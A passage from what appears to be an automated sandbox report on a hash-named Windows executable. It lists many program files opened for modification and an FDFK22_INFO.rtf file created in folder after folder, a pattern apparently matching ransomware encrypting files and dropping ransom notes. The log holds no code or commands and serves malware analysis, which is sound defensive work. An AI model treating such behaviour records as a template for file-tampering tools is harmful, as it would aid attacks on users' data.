Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Broken_Hill a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_CopyDrop32x32.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\diagnostic-command-16.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-nodes_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\La_Rioja a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+2 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore.change_2.10.0.v20140901-1043.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-api.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\ct.sym a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\VideoLAN Website.url a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Cairo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Chagos a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-snaptracer.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Gambier a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticattribute.exsd a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as80.xsl a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\dragHandle.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\meta-index a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh89 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Melbourne a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Aqtobe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\zipfs.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\bg.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\AcroRead.msi a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\SettingsInternal.zip a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.filesystem_1.4.100.v20140514-1614.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Bucharest a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Dubai a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\cs.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Qatar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\extcheck.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\rt.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-explorer_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-io-ui.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Accessibility.api a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Nipigon a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nipigon a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Amman a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\PST8PDT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Lima a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\GRAY.pf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\security\local_policy.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Google\Update\Install\{5DF2DCA9-BD54-4513-9B32-2C551D72B961}\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\kinit.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dhaka a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\zipfs.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cambridge_Bay a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Mozilla Firefox\platform.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Los_Angeles a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\ar.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\VisualElements\LogoCanary.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+11 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\chrome.exe.sig a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\New_Salem a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\hu.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Indianapolis a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Brunei a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.zh_CN_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\La_Rioja a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui_2.3.0.v20140404-1657.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Tokyo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Palau a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\license.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\splash.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\London a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\olh.htm a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-sa.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\access-bridge-64.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\YST9 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\RemoveResume.asp a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker_1.1.200.v20131119-0908.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\MANIFEST.MF a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yakutsk a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Salta a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\skins\fonts\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Bishkek a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Phoenix a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\README-JDK.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.commands_0.10.2.v20140424-2344.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.property_1.4.200.v20140214-0004.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jmc.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\mailapi.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Scoresbysund a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\classlist a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Volgograd a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\WatchFormat.wmf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kathmandu a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaSansDemiBold.ttf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+3 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\about.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Petersburg a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-13 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Wallis a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\NOTICE a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic.zh_CN_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Blanc-Sablon a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Search5.api a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\ui.js a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\weblink.api a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-utilities_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro.ja_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sampler_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Montreal a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\HLS.api a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\index.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-11 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\modules\host.luac a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Windows Journal\Templates\Memo.jtp a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\Documentation.url a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Gambier a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.STD a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\bin\unpack200.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Los_Angeles a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql2000.xsl a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Samarkand a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\ffjcext.zip a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-templates_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\FDFK22_INFO.rtf 